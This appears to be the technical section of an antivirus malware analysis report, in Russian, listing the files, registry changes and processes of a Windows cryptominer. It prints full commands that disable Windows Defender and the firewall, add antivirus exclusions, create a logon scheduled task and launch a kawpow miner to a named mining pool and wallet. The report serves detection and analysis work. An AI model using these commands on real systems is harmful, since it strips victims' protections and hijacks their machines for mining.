Техническая информация
- <SYSTEM32>\tasks\windows protection
- [<HKLM>\System\CurrentControlSet\Services\IKEEXT] 'Start' = '00000002'
- [<HKLM>\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile] 'EnableFirewall' = '00000000'
- [<HKLM>\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'EnableFirewall' = '00000000'
- Системный антивирус (Защитник Windows)
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ALLUSERSPROFILE%\Defender' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ALLUSERSPROFILE%\Task Host' = '00000000'
- '%WINDIR%\syswow64\net.exe' stop windefend
- '<SYSTEM32>\taskkill.exe' /F /FI "imagename eq Windows Protection.exe"
- '<SYSTEM32>\taskkill.exe' /F /FI "imagename eq Windows Process.exe"
- %HOMEPATH%\desktop\dod.exe
- %TEMP%\autdc7d.tmp
- %ALLUSERSPROFILE%\defender\start.vbs
- %TEMP%\autdc9d.tmp
- %ALLUSERSPROFILE%\defender\k.bat
- %TEMP%\autdcae.tmp
- %ALLUSERSPROFILE%\defender\k.vbs
- %TEMP%\autdcce.tmp
- %ALLUSERSPROFILE%\defender\p.vbs
- %TEMP%\autdd1d.tmp
- %ALLUSERSPROFILE%\defender\s.vbs
- %TEMP%\autdbff.tmp
- %ALLUSERSPROFILE%\defender\start.exe
- %TEMP%\autdd7c.tmp
- %ALLUSERSPROFILE%\defender\timeout.ps1
- %TEMP%\autde0a.tmp
- %ALLUSERSPROFILE%\defender\windows process.exe
- %TEMP%\fdde.tmp\fdef.tmp\fdff.bat
- %TEMP%\3b6a.tmp\3c07.tmp\3c18.bat
- %TEMP%\4450.tmp\4451.tmp\4452.bat
- %TEMP%\ycpysy8h.0.cs
- %TEMP%\ycpysy8h.cmdline
- %TEMP%\ycpysy8h.out
- %TEMP%\csc5c14.tmp
- %ALLUSERSPROFILE%\defender\s.bat
- %TEMP%\autdd9c.tmp
- %ALLUSERSPROFILE%\defender\winring0x64.sys
- %TEMP%\autdbc0.tmp
- %ALLUSERSPROFILE%\defender\windows protection.exe
- %ALLUSERSPROFILE%\defender\config.json
- %TEMP%\aut7c13.tmp
- %ALLUSERSPROFILE%\defender\ab.exe
- %ALLUSERSPROFILE%\defender\dc.ini
- %ALLUSERSPROFILE%\defender\dd.bat
- %ALLUSERSPROFILE%\defender\ddd.bat
- %ALLUSERSPROFILE%\defender\dc.exe
- %ALLUSERSPROFILE%\defender\dd.vbs
- %TEMP%\aut905f.tmp
- %ALLUSERSPROFILE%\defender\ac1.exe
- %ALLUSERSPROFILE%\defender\a.exe
- %TEMP%\aut7bf3.tmp
- %ALLUSERSPROFILE%\defender\d.exe
- %ALLUSERSPROFILE%\defender\d1.exe
- %ALLUSERSPROFILE%\defender\t.bat
- %ALLUSERSPROFILE%\defender\t.vbs
- %ALLUSERSPROFILE%\defender\u.exe
- %WINDIR%\syswow64\grouppolicy\gpt.ini
- %TEMP%\auta92d.tmp
- %ALLUSERSPROFILE%\defender\ac.exe
- %ALLUSERSPROFILE%\defender\min.exe
- %TEMP%\autd567.tmp
- %ALLUSERSPROFILE%\task host\svchost.exe
- %TEMP%\autd72d.tmp
- %ALLUSERSPROFILE%\defender\d.vbs
- %TEMP%\res5c24.tmp
- %TEMP%\ycpysy8h.dll
- %TEMP%\aut7bf3.tmp
- %TEMP%\ycpysy8h.cmdline
- %TEMP%\ycpysy8h.pdb
- %TEMP%\ycpysy8h.out
- %TEMP%\csc5c14.tmp
- %TEMP%\res5c24.tmp
- %TEMP%\4450.tmp\4451.tmp\4452.bat
- %TEMP%\3b6a.tmp\3c07.tmp\3c18.bat
- %TEMP%\fdde.tmp\fdef.tmp\fdff.bat
- %TEMP%\autde0a.tmp
- %TEMP%\autdd9c.tmp
- %TEMP%\autdd7c.tmp
- %TEMP%\autdd1d.tmp
- %TEMP%\autdcce.tmp
- %TEMP%\autdcae.tmp
- %TEMP%\autdc9d.tmp
- %TEMP%\autdc7d.tmp
- %TEMP%\autdbff.tmp
- %TEMP%\autdbc0.tmp
- %TEMP%\autd72d.tmp
- %TEMP%\autd567.tmp
- %TEMP%\auta92d.tmp
- %TEMP%\aut905f.tmp
- %TEMP%\aut7c13.tmp
- %TEMP%\ycpysy8h.0.cs
- %TEMP%\ycpysy8h.dll
- %ALLUSERSPROFILE%\ntuser.pol
- %ALLUSERSPROFILE%\tempntuser.pol
- %HOMEPATH%\ntuser.pol
- %HOMEPATH%\tempntuser.pol
- 'localhost':61510
- 'localhost':63772
- ClassName: 'EDIT' WindowName: ''
- ClassName: '' WindowName: ''
- '%HOMEPATH%\desktop\dod.exe'
- '%ALLUSERSPROFILE%\defender\min.exe'
- '%ALLUSERSPROFILE%\defender\windows protection.exe'
- '<SYSTEM32>\wscript.exe' "%ALLUSERSPROFILE%\Defender\k.vbs"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -executionpolicy Unrestricted %ALLUSERSPROFILE%\Defender\timeout.ps1
- '%ALLUSERSPROFILE%\defender\windows process.exe' --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 30 -u RXuishujdXgfbAfeM6NYK1KsikNFPDHh7a.x
- '<SYSTEM32>\wscript.exe' "%ALLUSERSPROFILE%\Defender\s.vbs"
- '%ALLUSERSPROFILE%\defender\start.exe'
- '<SYSTEM32>\wscript.exe' "%ALLUSERSPROFILE%\Defender\p.vbs"
- '%ALLUSERSPROFILE%\task host\svchost.exe'
- '%ALLUSERSPROFILE%\defender\ac.exe' -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA
- '%ALLUSERSPROFILE%\defender\ab.exe' -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA
- '%WINDIR%\syswow64\wscript.exe' "%ALLUSERSPROFILE%\Defender\dd.vbs"
- '%ALLUSERSPROFILE%\defender\ac1.exe' -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA
- '%ALLUSERSPROFILE%\defender\d.exe' 61 %ALLUSERSPROFILE%\Defender\d1.exe
- '%WINDIR%\syswow64\wscript.exe' "%ALLUSERSPROFILE%\Defender\d.vbs"
- '%ALLUSERSPROFILE%\defender\u.exe'
- '%ALLUSERSPROFILE%\defender\windows protection.exe' ' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\3B6A.tmp\3C07.tmp\3C18.bat "%ALLUSERSPROFILE%\Task Host\svchost.exe""' (со скрытым окном)
- '%ALLUSERSPROFILE%\task host\svchost.exe' ' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\4450.tmp\4451.tmp\4452.bat "%ALLUSERSPROFILE%\Task Host\svchost.exe""' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%ALLUSERSPROFILE%\Defender\s.bat" "' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\FDDE.tmp\FDEF.tmp\FDFF.bat %ALLUSERSPROFILE%\Defender\Start.exe"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES5C24.tmp" "%TEMP%\CSC5C14.tmp"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%ALLUSERSPROFILE%\Defender\k.bat" "' (со скрытым окном)
- '%ALLUSERSPROFILE%\defender\d.exe' 61 %ALLUSERSPROFILE%\Defender\d1.exe' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c ""%ALLUSERSPROFILE%\Defender\t.bat" "' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\ycpysy8h.cmdline"' (со скрытым окном)
- '%ALLUSERSPROFILE%\defender\windows process.exe' --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 30 -u RXuishujdXgfbAfeM6NYK1KsikNFPDHh7a.x' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c ""%ALLUSERSPROFILE%\Defender\t.bat" "
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\ycpysy8h.cmdline"
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\4450.tmp\4451.tmp\4452.bat "%ALLUSERSPROFILE%\Task Host\svchost.exe""
- '<SYSTEM32>\cmd.exe' /c ""%ALLUSERSPROFILE%\Defender\s.bat" "
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\3B6A.tmp\3C07.tmp\3C18.bat "%ALLUSERSPROFILE%\Task Host\svchost.exe""
- '%WINDIR%\syswow64\schtasks.exe' /CREATE /SC ONLOGON /TN "Windows Protection" /TR "%ALLUSERSPROFILE%\Defender\Start.exe" /f
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v ServiceKeepAlive /t REG_DWORD /d 0 /f
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES5C24.tmp" "%TEMP%\CSC5C14.tmp"
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "%ALLUSERSPROFILE%\Defender" /t REG_DWORD /d 0 /f
- '%WINDIR%\syswow64\net1.exe' stop windefend
- '<SYSTEM32>\timeout.exe' /t 10
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\FDDE.tmp\FDEF.tmp\FDFF.bat %ALLUSERSPROFILE%\Defender\Start.exe"
- '<SYSTEM32>\raserver.exe' /offerraupdate
- '<SYSTEM32>\gpscript.exe' /RefreshSystemParam
- '%WINDIR%\syswow64\netsh.exe' Advfirewall set allprofiles state off
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "%ALLUSERSPROFILE%\Task Host" /t REG_DWORD /d 0 /f
- '<SYSTEM32>\cmd.exe' /c ""%ALLUSERSPROFILE%\Defender\k.bat" "